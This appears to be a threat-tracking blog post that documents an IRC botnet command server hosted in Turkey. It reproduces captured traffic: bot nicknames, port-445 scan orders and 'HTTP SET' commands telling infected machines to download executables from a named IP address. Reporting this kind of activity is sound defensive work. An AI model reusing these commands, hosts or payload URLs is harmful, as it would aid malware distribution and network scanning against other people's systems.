java.KUTLUFAMILY.COM ( botnet hosted in Turkey Radore Hosting Telekomunikasyon Hizmetleri San. Ve Tic. Ltd. Sti)

Resolved : [java.KUTLUFAMILY.COM] To [178.211.56.105]
Resolved : [java.KUTLUFAMILY.COM] To [178.211.56.104]

Remote Host Port Number
178.211.56.104 81 ircd here
74.206.242.164 80

NICK [N00_USA_XP_3401546]`
PRIVMSG [N00_USA_XP_3401
@ :scan; Sequential Port Scan started on 174.133.89.0:445 with a delay of 5 seconds for 0 minutes using 10 threads.
@ :scan; Random Port Scan started on 174.x.x.x:445 with a delay of 5 seconds for 0 minutes using 10 threads.
@ :scan; Random Port Scan started on 174.133.x.x:445 with a delay of 5 seconds for 0 minutes using 10 threads.
@ :scan; Sequential Port Scan started on 192.168.194.0:445 with a delay of 5 seconds for 0 minutes using 5 threads.
MODE #zz -ix
USER SP2-548 * 0 :COMPUTERNAME
MODE [N00_USA_XP_3401546]`
A -ix
JOIN #zz
PRIVMSG #xs :HTTP SET http://178.211.56.90/as3e.exe

UPDATE:
NICK [N00_USA_XP_8701362]P
PRIVMSG [N00_USA_XP_8701
@ :scan; Sequential Port Scan started on 192.168.88.0:445 with a delay of 5 seconds for 0 minutes using 10 threads.
USER SP2-354 * 0 :COMPUTERNAME
@ :scan; Random Port Scan started on 174.133.x.x:445 with a delay of 5 seconds for 0 minutes using 10 threads.
@ :scan; Random Port Scan started on 174.x.x.x:445 with a delay of 5 seconds for 0 minutes using 10 threads.
MODE #f1 -ix
MODE [N00_USA_XP_8701362]P
A -ix
JOIN #f1
PRIVMSG #xs :HTTP SET http://178.211.56.90/f.exe

UPDATE:
NICK [N00_USA_XP_3562728]P
PRIVMSG [N00_USA_XP_3562
@ :scan; Sequential Port Scan started on 192.168.62.0:445 with a delay of 5 seconds for 0 minutes using 10 threads.
USER SP2-872 * 0 :COMPUTERNAME
@ :scan; Random Port Scan started on 174.133.x.x:445 with a delay of 5 seconds for 0 minutes using 10 threads.
@ :scan; Random Port Scan started on 174.x.x.x:445 with a delay of 5 seconds for 0 minutes using 10 threads.
MODE #g1 -ix
MODE [N00_USA_XP_3562728]P
A -ix
JOIN #g1
PRIVMSG #xs :HTTP SET http://178.211.56.90/g.exe

info about hosting:
http://whois.domaintools.com/178.211.56.104

Categories: Uncategorized